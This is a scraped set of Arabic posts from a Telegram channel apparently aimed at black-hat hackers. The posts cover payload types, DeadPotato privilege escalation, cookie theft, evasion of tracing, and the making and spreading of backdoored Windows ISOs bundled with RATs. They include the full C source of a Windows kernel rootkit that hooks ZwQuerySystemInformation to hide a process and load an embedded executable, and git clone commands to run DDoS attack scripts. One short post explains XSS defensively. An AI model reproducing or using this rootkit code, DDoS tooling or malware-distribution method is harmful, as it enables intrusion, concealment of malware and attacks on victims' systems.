يثبته لتخترقه ولايمكنك ان تجعله على شكل صورة او فيديو حيث صعب الاختراق به \n\n 2- سيرفر للحواسيب : وهو سيرفر برنامج للحاسوب لكن يتم اختراق اي شخص يفتحه على حاسوبه وايضا يتميز هذا السيرفر بانه يمكنك دمجه بصورة او اي ملف مثلا فيديو او اي شيء ويصبح على شكل الملف الذي دمجته معه واي شخص يفتحه يتم اختراق حاسوبه .\n\n3- بايلودات لغات برمجية : وفي هذه البايلودات تكون على شكل سكربت مبرمج بلغة برمجية مثلا python او perl او لغات اخرى بمجرد ان الشخص يقوم بتشغيل هذا السكربت بتيرموكس يتم اختراقه وهو متقدم لانه يمكنك رفع هذا السكربت على موقع github حيث ينتجلك رابط لتحمل السكربت وتضع له اسم جذاب ليجذب الاشخاص اليه وعندما يثبتون الاداة ويشغلون السكربت يتم اختراقهم \n\n3- بايلودات متقدمة : وفي هذه البايلودات نقصد مثلا رابط اذا قام اي شخص بفتحه تخترق جهازه بلكامل وليس فقط رابط هناك بايلود لفيديو بحيث اي شخص يقوم بتشغيل الفيديو تخترق هاتفه او بايلود اغنية اي شخص يشغلها تخترق هاتفه او بايلود صورة وهكذا \n\n -الادوات التي تقوم بهذه البايلودات :\n\n 1- بايلود للهواتف : \nبرنامج SpyNote او ادات Metasploit \n\n 2- بايلود للحواسيب : \nاداة Metasploit او برنامج Killrat \n\n 3- البايلودات البرمجية : \nاداة venom وايضا Metasploit \n\n 4- البايلودات المتقدمة : \nاداة Metasploit او بعض الادوات المدفوعة \n لااشجع سوا استخدام ادوات مشهورة وامنة مثل ميتاسبلويت او ارميتاج وانظمة مثل كالي لينكس \n\nوبس والله 😊","datePublished":"2025-05-24T11:05:10Z","dateModified":"2025-05-24T11:05:10Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":30}]}},{"@type":"ListItem","position":20,"item":{"@type":"SocialMediaPosting","@id":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1513","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1513","mainEntityOfPage":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf/posts/1513","headline":"تطبيق مستخدم بلشرح لتطوير تطبيق ادمن وضاحيه","articleBody":"تطبيق مستخدم بلشرح لتطوير تطبيق ادمن وضاحيه","datePublished":"2025-05-24T11:05:10Z","dateModified":"2025-05-24T11:05:10Z","author":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"publisher":{"@type":"Organization","name":"RED TEAM CYBERSECURITY-SM🇪🇬","url":"https://telemetr.io/fa/channels/2101004161-cybersecuritytemdf","image":"https://img.telemetr.io/c/2ibB9T/5983588376700980600?ty=x"},"commentCount":0,"interactionStatistic":[{"@type":"InteractionCounter","interactionType":"https://schema.org/ViewAction","userInteractionCount":35},{"@type":"InteractionCounter","interactionType":"https://schema.org/ShareAction","userInteractionCount":1}]}}]}











الكود ده فيه ثغرة من نوع XSS واللي هي اختصار لـ Cross-Site Scripting والسبب في كده إن الكود بيعرض inputs اللي المستخدم بيكتبها في الـ input مباشرة على الصفحة باستخدام document.body.innerHTML ودي طريقة غير آمنة تماما لإنها بتسمح بحقن أكواد JavaScript ضارة وعرضها أو تنفيذها في سياق المتصفح الخاص بالمستخدم وبالتالي لو في حد ضار أو هاكر قدر يدخل كود JavaScript في حقل الـ input زي الكود ده هيتنفذ مباشرة على الصفحة وده معناه إن أي مستخدم يفتح الصفحة دي بعد كده هيتعرض للثغرة اللي ممكن الهاكر يستغلها في سرقة الكوكيز الخاصة بالمستخدم أو تنفيذ أكواد خبيثة تؤدي لسرقة الجلسات أو حتى حقن أكواد ضارة عشان تسرق بيانات تانية أكتر حساسية زي الـ Tokens اللي بتستخدم في الجلسات أو البيانات الشخصية المشكلة في النوع ده من الثغرات إنها بتسبب تهديد حقيقي لأمان التطبيق والمستخدمين وكمان بتعتبر من الثغرات اللي ممكن تستغل بسهولة كبيرة لو المطورين مش بياخدوا بالهم من كيفية التعامل مع المدخلات بطريقة آمنة الحلول الأساسية لتفادي النوع ده من الثغرات بتتمثل في استخدام طرق آمنة لعرض البيانات زي textContent أو التأكد من تطهير المدخلات عن طريق استخدام مكتبات متخصصة لتطهير المدخلات زي DOMPurify اللي بتنضف المدخلات من أي أكواد ضارة وتمنع تنفيذ أي أكواد JavaScript غير مرغوب فيها بالإضافة لإن المطور لازم يكون واعي لفكرة الـ Content Security Policy (CSP) واللي بيسمح للمطور يحدد مصادر الأكواد اللي ممكن تتنفذ على الصفحة ودي بتقلل بشكل كبير احتمالية تنفيذ أي ميليشيوس كودز
وبس والله 😊
السكريبت اللي بنتكلم عنه هنا هو "DeadPotato" واللي بيعتبر واحد من الأدوات القوية في عالم الهجوم على أنظمة الويندوز تحديدا في سيناريوهات التصعيد للامتيازات أو الـ Privilege Escalation ودي واحدة من أخطر وأهم الخطوات في أي عملية هجوم ناجحة على أي نظام لأنه بمجرد ما المخترق يقدر يرفع مستوى صلاحياته على الجهاز بيبقى ليه سيطرة كاملة على النظام وبيقدر ينفذ أوامر خطيرة ويثبت برامج ضارة أو مالوير ويجمع معلومات حساسة والسكريبت ده مبني على فكرة استغلال ثغرات قديمة في أنظمة ويندوز زي ثغرة الـ RottenPotato أو JuicyPotato واللي بتسمح للمخترق إنه يستخدم صلاحيات الـ SYSTEM أو الـ Administrator على الجهاز المستهدف من خلال التلاعب ببعض البروتوكولات اللي بيستخدمها ويندوز للتواصل بين العمليات الداخلية في النظام زي الـ DCOM والـ RPC اللي هما Distributed Component Object Model وRemote Procedure Call على التوالي.
الـ DeadPotato بيسمح للمهاجم إنه ينفذ كود معين بصلاحيات عالية من غير ما يكون ليه وصول مباشر لصلاحيات الـ SYSTEM في الأول ودي نقطة مهمة جدا لأن معظم العمليات اللي بتحصل على النظام بتكون بصلاحيات محدودة يعني مش كل واحد يستخدم الكمبيوتر أو السيرفر عنده صلاحيات النظام بالكامل وده اللي بيخلي اختراق الأنظمة الحديثة أكتر تعقيدا وأصعب لكن باستخدام DeadPotato بيتمكن المهاجم إنه يستغل حاجة اسمها NTLM Relay Attack علشان يوصل للـ SYSTEM privileges على الجهاز المصاب من غير ما يكون عنده أصلا الوصول المباشر ليها.
بخصوص تصحيح المعلومة وتنسيقها بشكل علمي أكتر خلينا نقول إن استغلال الـ NTLM Relay في DeadPotato بيتم من خلال إرسال طلبات تصديق مزورة للـ NTLM protocol داخل النظام ده بيتم عن طريق خداع الخدمة اللي بتمشي الطلبات دي زي خدمة COM أو DCOM اللي هي أساسا بتمشي طلبات بينها وبين الـ LSASS اللي هي Local Security Authority Subsystem Service المسؤولة عن إدارة سياسات الأمان وعمليات التوثيق في ويندوز واللي بيحصل هنا إن السكريبت بيعمل حاجة اسمها "Token Impersonation" واللي بتسمح للمهاجم بأنه يقلد صلاحيات المستخدم الموثق بحيث إنه يقدر ينفذ أي أمر أو ينزل أي برنامج ضار بصلاحيات أعلى بكثير من اللي كان يقدر ينفذها لوحده في الحالة الطبيعية.
لو انت بتهدف إنك تدمج DeadPotato مع مالوير معين علشان تنفذ هجوم شامل وقوي على أنظمة ويندوز لازم تفكر بطريقة البلاك هات اللي هي المخترقين اللي بيستخدموا مهاراتهم لشن هجمات ضارة وإلحاق أذى حقيقي أو سرقة بيانات ومعلومات مالية وحساسة لما تدمر الحماية على النظام باستخدام DeadPotato هتقدر بعد كده تدخل المالوير بتاعك بشكل سلس وبدون ما يتم اكتشافه بسهولة خصوصا لو عملت باندنغ مع سكريبت تاني زي Mimikatz اللي بيتيح لك استخراج التوكينز وكلمات المرور من الذاكرة واللي بيسمح لك أنك تكمل الهجوم بتاعك بشكل أسرع وأنجح وتسيطر على الشبكة كلها.
قوة DeadPotato بتيجي من إنه بيستغل البروتوكولات اللي هي أصلا جزء أساسي من نظام التشغيل وماحدش يقدر يقفلها بسهولة لأن لو قفلتها هتعطل حاجات تانية في السيستم يعني المهاجم بيلعب على حتة حساسة جدا في النظام علشان كده الهجوم بيبقى خطير وصعب الحماية ضده وفي نفس الوقت بيسهل دمج الهجمات دي في مالوير لأنك بتضمن إن مالويرك هيشتغل بصلاحيات عالية وبدون ما يحتاج إنه يكسر حماية كبيرة في البداية.
رابط المشروع على جيت هوب
وبس والله 😊
مشروع Indetectables Toolkit اللي موجود على GitHub هو مكتبة مفتوحة المصدر بتضم مجموعة أدوات وتقنيات متقدمة مخصصة لتحليل البرمجيات الخبيثة والهندسة العكسية وكمان تطوير أو كسر حماية البرمجيات وهو مشروع بيستهدف بشكل أساسي المهتمين بالأمن السيبراني سواء محترفين أو هاكرز بس لو بنتكلم في سياق البلاك هات فهو يعتبر كنز لأي شخص عايز يعزز مهاراته في تطوير الأدوات أو اختراق الأنظمة لأن المشروع بيوفر بيئة جاهزة للتجربة والتطوير واللي يميزه إنه بيشتغل بشكل عام على ملفات التنفيذ سواء EXE أو DLL وبيساعد على تحليل الكود الخاص بيها وفهم العمليات اللي بتحصل داخل البرامج وخاصة العمليات اللي بتتعامل مع الذاكرة زي Buffer Management أو عمليات التحميل الديناميكي للملفات
البلاك هات ممكن يستخدم المشروع ده بشكل مباشر في تحليل الثغرات داخل البرمجيات أو الأنظمة المستهدفة لأن الأدوات دي بتوفر وسائل لفهم كيفية تعامل التطبيقات مع المدخلات والبيانات وبكده يقدر الهكر يكتشف أخطاء في الأكواد زي Buffer Overflow أو Heap Exploitation اللي بتظهر لما البرنامج يستقبل بيانات أكتر من حجم الذاكرة المخصص ليها وده بيتيح تنفيذ أكواد ضارة جوه البرنامج المستهدف بالإضافة إلى إن الأدوات دي بتشتغل على مستوى متقدم من الهندسة العكسية وبتساعد الهكر في فك التشفير أو الحماية اللي بتكون موجودة على البرامج زي آليات Licensing Systems أو DRM واللي بتستخدم لحماية البرامج من النسخ أو التعديل
لو الهكر عنده خلفية برمجية قوية ممكن يطوّر الأدوات دي عشان تبقى أكتر تعقيداً وفعالية زي إنه يضيف تقنيات لتعتيم الكود Obfuscation واللي بتساعد على إخفاء البرمجيات الخبيثة من برامج الحماية أو يدمجها مع مكتبات زي Radare2 أو Capstone اللي بتقدم إمكانيات تحليل متقدم للأكواد الثنائية وممكن كمان يضيف إمكانيات لتحليل الشبكات مع البرامج دي باستخدام مكتبات زي Scapy لتحليل حزم البيانات أو إدخال وظائف لتوليد Payloads متطورة تقدر تخترق الأنظمة الحديثة
من الأفكار اللي ممكن الهكر يدمجها مع المشروع هي إنه يضيف تقنيات استغلال Automated Exploitation عشان يخلي الأدوات بتشتغل تلقائياً على اكتشاف واستغلال الثغرات وممكن كمان يدمج المشروع مع أدوات متطورة زي IDA Pro أو Ghidra لتحليل البرمجيات بشكل أعمق وفك الكود المصدري بشكل أوضح واللي هيتيح للهكر مش بس فهم الكود لكن كمان إعادة بنائه أو تعديله بما يناسب احتياجاته
في مجال كسر البرامج الأدوات دي بتساعد الهكر في فك حماية البرامج من خلال تحليل الـ Binary Code وإيجاد النقاط اللي فيها عمليات تحقق التراخيص ودي ممكن يتم تجاوزها بسهولة باستخدام تقنيات Patch Based Exploitation اللي بتعدل على الكود الموجود جوه الملف التنفيذي أو إدخال تقنيات مثل Code Injection لإضافة تعليمات برمجية جديدة تخدم الغرض المطلوب وفي مجال اكتشاف الثغرات الأدوات دي ممكن تستخدم لفحص الأماكن اللي بيتم فيها تخصيص الذاكرة جوه التطبيقات وتحليل الـ Stack Frames بشكل يدوي أو تلقائي عشان يكتشف الهكر الأماكن اللي ممكن يحصل فيها تجاوز للذاكرة أو Access Violations ودي أكتر الأماكن اللي بيتم استغلالها في الثغرات الحديثة
الهكر اللي عايز يطور الأدوات دي ممكن كمان يستغل الذكاء الاصطناعي في تحليل الأكواد دي بشكل أسرع ويدمج خوارزميات Machine Learning لتحديد الأماكن اللي ممكن تكون عرضة للاستغلال بشكل تلقائي وكمان ممكن يطور واجهة رسومية للمشروع عشان يبقى سهل الاستخدام حتى للي معندوش خبرة كبيرة في التعامل مع الأدوات التقليدية وأخيراً المشروع يعتبر منصة مفتوحة لأي شخص عايز يتعلم أو يطور في مجال الأمن السيبراني والهندسة العكسية بشرط يكون عنده أساسيات برمجية قوية ومهارات تحليلية
رابط المشروع على جيت هوب
الكود اللي قدامنا ده معمول علشان يعمل درايفر لويندوز يستخدم تقنيات متقدمة زي الـHooking علشان يخفي عمليات معينة شغالة في النظام أو يشغل كود خبيث من الميموري. الطريقة دي معروفة وسط الهكرز باسم الـRootkits وهي واحدة من أخطر وأكتر الحاجات اللي بتتعمل علشان تتجاوز الحماية في الويندوز.
في البداية الكود بيعرف شوية متغيرات وبيظبط الأساسيات، زي تعريف دالة
ZwQuerySystemInformation اللي بتستخدم علشان النظام يجيب معلومات عن كل العمليات الشغالة. لكن هنا الهكر بيغير شغل الدالة دي عن طريق الـHook. بمعنى لما أي حاجة في الويندوز تحاول تنادي الدالة دي، الكود بتاع الهكر يدخل في النص ويعدل على النتيجة اللي بتطلع بحيث يخفي أي عملية هو عايز يخبيها، زي مثلًا لو في فايل تنفيذي (exe) شغال وعايز يخفيه عن الأنظار.
الكود كمان بيستخدم Base64 encoding علشان يخزن فايل تنفيذي (مثلاً مالوير) جوة الكود بشكل مش مباشر. وبعد كده بيستخدم دالة اسمها Base64Decode علشان يفك التشفير ويرجع الفايل ده كداتا في الميموري. هنا الهكر ممكن يطور الفكرة دي أكتر ويشغل الكود ده مباشرة من الميموري من غير ما يكتبه على الهارد، وده بيخلي اكتشافه أصعب لأن معظم برامج الأنتي فيرس بتركز على الملفات اللي مكتوبة على الهارد.
جزء مهم تاني هو دالة HookedZwQuerySystemInformation. هنا الهكر بيعدل على المعلومات اللي بتطلع لما النظام يعرض العمليات الشغالة. الطريقة دي بتسمحله يخفي العملية اللي بتشغل المالوير، وده معناه إن أي أداة مراقبة أو حتى المستخدم نفسه مش هيقدر يشوف العملية دي وكأنها مش موجودة.
أما بالنسبة للأفكار اللي ممكن يضيفها البلاك هات على الكود ده فهي كتير. أول حاجة ممكن يدمج تقنية الـProcess Hollowing، اللي بتشغل كود المالوير جوة عملية عادية زي Notepad.exe علشان يبقى أصعب في اكتشافه. كمان ممكن يضيف تشفير للباينري بحيث لو حد حاول يحلل الكود ما يعرفش يوصل لحاجة بسهولة. وكمان ممكن يحط ميكانيزم للـPersistence بحيث المالوير يرجع يشتغل مع كل إعادة تشغيل للجهاز.
تطوير الكود ده ممكن كمان يشمل دمج دوال تانية زي ZwCreateProcess أو ZwMapViewOfSection لتشغيل الفايل من الميموري مباشرة. ده يخلي المالوير أخطر بكتير لأن تشغيله بيتم بالكامل في الرام من غير ما يسيب أثر واضح على الجهاز. وممكن يضيف كود علشان يعمل Bypass لآليات الحماية الحديثة زي الـPatchGuard اللي في ويندوز.
الفايدة اللي هياخدها البلاك هات من الكود ده إنه مش بس هيخفي عملياته، لكن كمان هيصعب على المحللين والأدوات اكتشاف وجوده في النظام. الكود ممكن يتعدل علشان يبقى أكتر مرونة ويتحط في سيناريوهات تانية زي سرقة الداتا من العمليات الشغالة، أو حتى التلاعب بآليات الحماية اللي في الويندوز.#include <ntddk.h>
#include <ntstrsafe.h>
// Define the function prototype for ZwQuerySystemInformation
typedef NTSTATUS (NTAPI *ZwQuerySystemInformation_t)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
// Original system function to query system information
ZwQuerySystemInformation_t OriginalZwQuerySystemInformation = NULL;
// Base64 string of the executable (you would replace this with your actual base64 string)
const char* base64ExeString = "YOUR_BASE64_STRING_HERE";
// Function to decode Base64 string
NTSTATUS Base64Decode(const char* base64, PVOID* outBuffer, PULONG outSize) {
ULONG length = 0;
UCHAR* decodedData = NULL;
NTSTATUS status = RtlDecodeBase64String(base64, &length, NULL);
if (NT_SUCCESS(status)) {
decodedData = (UCHAR*)ExAllocatePool(NonPagedPool, length);
if (decodedData) {
status = RtlDecodeBase64String(base64, &length, decodedData);
if (NT_SUCCESS(status)) {
*outBuffer = decodedData;
*outSize = length;
} else {
ExFreePool(decodedData);
}
} else {
status = STATUS_INSUFFICIENT_RESOURCES;
}
}
return status;
}
// Function to load the decoded executable into memory
NTSTATUS LoadExeFromMemory(PVOID buffer, ULONG size) {
// In a real-world scenario, you would use functions like
// ZwCreateSection, ZwMapViewOfSection, and ZwCreateProcess
// to execute the code directly from memory. This part is left
// abstract as it involves complex kernel-mode operations.
DbgPrint("Loaded executable into memory with size: %d\n", size);
return STATUS_SUCCESS;
}
// Hooked ZwQuerySystemInformation to hide the process
NTSTATUS NTAPI HookedZwQuerySystemInformation(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
) {
NTSTATUS status = OriginalZwQuerySystemInformation(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength
);
if (status == STATUS_SUCCESS) {
SYSTEM_PROCESS_INFORMATION* info = (SYSTEM_PROCESS_INFORMATION*)SystemInformation;
// Iterate through processes and hide the target process (e.g., "hidden_process.exe")
while (info->NextEntryOffset) {
if (wcscmp(info->ImageName.Buffer, L"hidden_process.exe") == 0) {
// Skip this process, effectively hiding it
info->NextEntryOffset = 0;
}
info = (SYSTEM_PROCESS_INFORMATION*)((PUCHAR)info + info->NextEntryOffset);
}
}
return status;
}
// Driver unload function
void DriverUnload(PDRIVER_OBJECT pDriverObject) {
// Restore the original system call
if (OriginalZwQuerySystemInformation) {
InterlockedExchangePointer(
(PVOID*)&ZwQuerySystemInformation,
(PVOID)OriginalZwQuerySystemInformation
);
}
DbgPrint("Driver unloaded\n");
}
// Driver entry function
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) {
PVOID exeBuffer = NULL;
ULONG exeSize = 0;
NTSTATUS status = Base64Decode(base64ExeString, &exeBuffer, &exeSize);
if (NT_SUCCESS(status)) {
DbgPrint("Base64 decoded successfully. Size: %d bytes\n", exeSize);
// Load and execute the decoded executable in memory
status = LoadExeFromMemory(exeBuffer, exeSize);
if (!NT_SUCCESS(status)) {
DbgPrint("Failed to load executable from memory.\n");
}
} else {
DbgPrint("Base64 decoding failed. Status: 0x%x\n", status);
}
// Hook the system call for process listing (ZwQuerySystemInformation)
OriginalZwQuerySystemInformation = (ZwQuerySystemInformation_t)ZwQuerySystemInformation;
ZwQuerySystemInformation = HookedZwQuerySystemInformation;
pDriverObject->DriverUnload = DriverUnload;
DbgPrint("Driver loaded\n");
return STATUS_SUCCESS;
}التخفي بالنسبة للبلاك هات حاجة أساسية عشان يقدر يشتغل بحرية ومن غير ما يتعقب بسهولة وفيه طرق معروفة زي استخدام VPN أو الـTOR لكن في طرق تانية مش أي حد يعرفها وبتعتمد على الإبداع والفهم العميق للتكنولوجيا واحدة من الطرق دي هي استخدام الـMAC Spoofing ودي فكرة إنك تغير الـMAC Address الخاص بالجهاز بتاعك وده لأنه بيبقى زي البصمة الفريدة لأي جهاز فلو حد بيتتبعك أو الشبكة اللي بتدخل عليها بتسجل الـMAC Address بتاعك هتلاقي إنك بمجرد تغيير العنوان ده بتشوش أي محاولة لتتبعك حاجة تانية هي استغلال ضعف البروتوكولات المستخدمة في الشبكات زي الـARP وده ممكن يسمح ليك إنك تعمل MITM Attack وتبقى مراقب الشبكة بالكامل من غير ما حد يعرف إنك موجود كمان فيه استخدام الأدوات اللي بتعدل على الـPackets قبل ما تخرج من جهازك زي Scapy في بايثون بحيث تحط بيانات مزيفة في الـHeaders مثلا تغير الـTTL Value أو الـSource IP بشكل متقدم أكتر حاجة متقدمة هي الـProxy Chains المتطورة اللي بتستخدم سلسلة من الـProxies مع الـObfuscation عشان تخلي مسار البيانات بتاعتك غير واضح وده بيحتاج إنك تفهم كويس ازاي كل بروكسي في السلسلة دي بيتعامل مع الـRequestات بتاعتك النقطة التانية اللي معظم البلاك هات ما يعرفوهاش هي الـFirmware Modification الفكرة إنك تعدل على الـFirmware بتاع الجهاز اللي بتستخدمه سواء كان راوتر أو موبايل بحيث تعمله Customize يحميك أكتر ويمنع تتبعك النقطة اللي بعد كده هي استغلال الأخطاء البرمجية في أنظمة التشغيل زي الـDLL Hijacking أو حتى الـSyscall Hooking ودي طرق بتخليك تغير في طريقة عمل النظام من الجذور وتمنع تسجيل أي نشاط ليك على الجهاز كمان فيه حاجة مهمة جدًا اسمها الـTiming Analysis عشان لو فيه أي محاولة لتتبعك عن طريق الأنماط الزمنية للحركة على الشبكة تقدر تغير فيها باستخدام الـTraffic Shaping اللي بتعدل في توقيت إرسال واستقبال البيانات بحيث تضيع أي محاولة للتحليل ودي مش طرق معقدة لكنها بتحتاج تدريب عشان تقدر تنفذها بكفاءة فيه كمان حركات تانية زي أنك تستغل التشفير الفريد للبيانات اللي بتخرج من جهازك باستخدام تقنيات Steganography عشان تخفي أي معلومات داخل ملفات تانية زي الصور أو الفيديوهات بشكل خفي تمامًا ومش ممكن يتشاف إلا لو حد فاهم التكنولوجيا دي بشكل عميق ده كله بيرجع لقاعدة واحدة وهي إنك دايمًا تكون متقدم خطوة على اللي ممكن يطاردك سواء كان قانون أو أفراد وتعرف تستغل كل ثغرة وكل نقطة ضعف سواء في البرامج أو الأجهزة وحتى العادات البشرية
الكوكيز هي ملفات صغيرة بيتم تخزينها في جهاز المستخدم لما يزور موقع على الإنترنت وبتحتوي على معلومات بتسهل تجربة التصفح زي اسم المستخدم وكلمة المرور والجلسات المفتوحة والتفضيلات الشخصية وطبيعة النشاط اللي بيعمله المستخدم على الموقع الكوكيز بتتصنف لأنواع كتير وكل نوع له استخدام معين زي الكوكيز المؤقتة ودي بتتخزن في ذاكرة المتصفح وبتتمسح بمجرد ما يقفل المستخدم المتصفح فيه كمان الكوكيز الدائمة اللي بتفضل متخزنة لفترة طويلة وبتساعد المواقع إنها تفتكر المستخدم وتفضيلاته زي ما بتشوف في المواقع اللي بتفتكر بيانات تسجيل الدخول أو العربيات اللي أضفتها لسلة الشراء أما الكوكيز التابعة لطرف ثالث فدي بتتخزن عن طريق إعلانات أو خدمات من مواقع تانية غير الموقع اللي بتزوره زي ما بيحصل في التتبع الإعلاني
الهكرز بيستخدموا تقنيات كتير للحصول على الكوكيز ومنها البرمجيات الخبيثة أو المالوير واللي فعلاً بتعتبر واحدة من الطرق ولكن مش الوحيدة المالوير ممكن يتثبت على جهاز الضحية ويبدأ يسرق الكوكيز اللي مخزنة في المتصفح وده بيساعد الهكر في سرقة الجلسات المفتوحة والدخول على حسابات الضحية بدون ما يحتاج كلمة المرور المالوير أداة قوية ولكن استخدامه معقد وبيحتاج تنفيذ متقن علشان ينجح لكن الهكر مش مضطر يعتمد على المالوير بس فيه تقنيات تانية زي هجمات الـXSS اللي بتستغل ثغرات في المواقع وبتخلي الكوكيز تتسرب للمهاجم من غير ما الضحية يحس الهجوم ده بيتم لما الهكر يحقن كود جافاسكريبت خبيث في صفحة ويب بيتفاعل معاها المستخدم وده الكود بيعمل إرسال للكوكيز للمهاجم
من الحاجات التانية اللي ممكن الهكر يستخدمها للحصول على الكوكيز هجمات الـMan-in-the-Middle اللي بتعتمد على اعتراض البيانات اللي بتتبعت بين المستخدم والخادم ودي بتشتغل لو الاتصال مش مشفر باستخدام HTTPS لما الهكر يعترض الاتصال يقدر يشوف الكوكيز ويستغلها مباشرة فيه كمان تقنيات الهندسة الاجتماعية اللي بتعتمد على خداع المستخدم لإرسال الكوكيز زي صفحات التصيد اللي بتشبه الموقع الأصلي وتطلب من المستخدم تسجيل الدخول
مهم تفهم إن الكوكيز أداة قوية للتخصيص وتحسين تجربة المستخدم لكنها كمان نقطة ضعف خطيرة لو ما تمش تأمينها كويس عشان كده لازم تستخدم متصفح محدث يدعم البروتوكولات المشفرة زي HTTPS وتفعل ميزة SameSite Attributes اللي بتمنع الكوكيز من التفاعل مع مواقع الطرف الثالث غير الموثوقة
تعديل أسطوانات الويندوز هو عملية تقنية معقدة لكنها من الأساليب الأساسية اللي بيعتمد عليها البلاك هات لتحقيق أهدافهم سواء في الاختراق أو التجسس أو حتى التحكم عن بُعد في الأنظمة المصابة وتبدأ العملية بفهم عميق لبنية الويندوز وتقنياته الأساسية لأن ده المفتاح لعمل نسخة معدلة تلبي الاحتياجات الخاصة ليهم أول خطوة بتكون بفك ملفات صورة الويندوز الأصلية (ISO) باستخدام أدوات متخصصة زي PowerISO أو 7-Zip وهنا بيتم استخراج كل ملفات النظام الأساسية زي ملفات الـDLL والـRegistry وملفات البوت زي boot.wim وinstall.wim بعد كده بيبدأ البلاك هات باستخدام أدوات تعديل متقدمة زي NTLite أو WinReducer اللي بتسمح ليه بتخصيص النسخة سواء عن طريق حذف خدمات معينة أو إضافة برمجيات وأدوات اختراق مباشرة جوة ملفات النسخة الأدوات دي بتتيح ليه تعديل الإعدادات الافتراضية للنظام زي تعطيل Windows Defender والجدار الناري (Firewall) لضمان عدم كشف البرمجيات الخبيثة المدمجة
من الخطوات المهمة في التعديل هي التلاعب بملفات الـRegistry لأن دي اللي بتتحكم في كل إعدادات النظام تقريبًا البلاك هات ممكن يعدل مفاتيح الـRegistry بحيث يضمن صلاحيات مدير للنظام بشكل تلقائي لكل المستخدمين أو يفتح بروتوكولات معينة زي RDP (Remote Desktop Protocol) للتحكم عن بُعد وأيضًا ممكن يضيف سكربتات Powershell أو ملفات تنفيذية خبيثة تتفعل تلقائيًا بمجرد تشغيل النظام بعد التثبيت باستخدام أدوات زي Metasploit Framework أو Cobalt Strike وعلشان البرمجيات دي تفضل مخفية وغير قابلة للاكتشاف بيتم استخدام أدوات تشفير وتغيير أسماء الملفات وأحيانًا توقيعها رقميًا باستخدام أدوات زي SignTool اللي بتسمح بتوقيع ملفات النظام عشان تبدو أصلية ومش معدلة
كمان من الحاجات اللي بيعتمد عليها البلاك هات هي تعديل ملف الإجابة التلقائية (Autounattend.xml) والملف ده بيسمح بتثبيت النظام تلقائيًا بدون تدخل المستخدم وده بيتيح ليه تخصيص الإعدادات بشكل كامل زي إنشاء حسابات بصلاحيات Admin أو تحديد إعدادات الشبكة بشكل يخدم أهدافه البلاك هات ممكن يضيف برمجيات خبيثة زي RATs (Remote Access Trojans) زي njRAT وDarkComet واللي بتشتغل في الخلفية بدون ما المستخدم يحس بوجودها بالإضافة إلى ذلك بعض البلاك هات بيستغلوا ثغرات معروفة في إصدارات الويندوز القديمة زي WannaCry اللي استغل ثغرة في بروتوكول SMB وبيسيبوا الثغرات دي مفتوحة وجاهزة للاستغلال بمجرد تشغيل النظام
بعد الانتهاء من التعديلات بيتم ضغط الملفات مرة تانية في صورة ISO باستخدام أدوات ضغط مخصصة وبيتم اختبار النسخة المعدلة على بيئة افتراضية زي VirtualBox أو VMware للتأكد من إن كل التعديلات شغالة بشكل سليم لو النسخة فيها مشاكل بيتعدل عليها مرة تانية لحد ما تكون جاهزة بعد كده بيتم نشر النسخة من خلال مواقع التورنت أو منصات مشاركة الملفات وأحيانًا البلاك هات بيستغل استراتيجيات الهندسة الاجتماعية عن طريق الترويج للنسخة على إنها نسخة معدلة ومميزة زي إضافة خلفيات جديدة أو برامج مدفوعة مجانية لجذب أكبر عدد من الناس لتثبيتها بمجرد ما الضحايا يثبتوا النسخة المعدلة البلاك هات بيبدأ يتحكم في الأنظمة المصابة ويستغلها في هجمات أكبر زي هجمات DDoS أو حتى تعدين العملات الرقمية
اذا هجمت DDOS واتحظرت ↔️
وانت ما تعرف او شئ وتريد تعرف الموقع شغال ام لا تفضل الاداه الجديده
اوامر التنزيل والتشغيل ⬇️⬇️
git clone https://github.com/MohamedAbuAl-Saud/Scan-DF/
cd Scan-DF
chmod +x scan-DF.sh
bash scan-DF.sh+1
DDOSATTACK↔️
حجب خدمه المواقع ↔️
اداه نزلت ع github امس تم تطورها بللغه Bash
الاداه متوسطه في الهجوم *️⃣
ادخل ضع الرابط انتضر الهحوم 20 دقيقه ع الاقل وشوف واهجم من اجهزه مختلفه ان قدرت + افتح كذا تيرمنل واهجم
اوعدك انها هتتطور 😊
تدعم (Termux& kali linux& Windows& Linux )
🟦🟦🟦🟦🟦
اوامر تنزيل وتشغيل ⬇️
git clone https://github.com/MohamedAbuAl-Saud/DDOSATTACK_DF.git
cd DDOSATTACK_DF
chmod +x DDOSATTACK.sh
bash DDOSATTACK.sh
🟦🟦🟦🟦🟦
By||@A_Y_TR⭐️
🟦🟦🟦🟦🟦
🟦🟦
DF🥷
🟦🟦
وبس والله😊برنامج CM64 Pro واحد من أقوى الأدوات اللي أي هاكر ممكن يستخدمها، وده لأنه بيقدم مميزات رهيبة تخليك تتحكم في كل حاجة في الجهاز من غير ما تحس إن فيه حاجة مقيدة شغلك. البرنامج واجهته بسيطة وسهلة، أي حد ممكن يتعامل معاها، بس المميز فيه إنه مليان حاجات احترافية تخلّي أي بلاك هات يقدر يستغلّه لأقصى درجة. أول حاجة مميزة فيه هي إنه بيخلّيك تعدّل على الكيرنل نفسه، يعني قلب نظام التشغيل، وتقدر تحفظ وتحمّل اللي عدلته بسهولة. الفكرة دي لوحدها بتفتح أبواب لا نهائية لأي حد عاوز يختبر أو يستغل النظام بطريقة مش تقليدية.
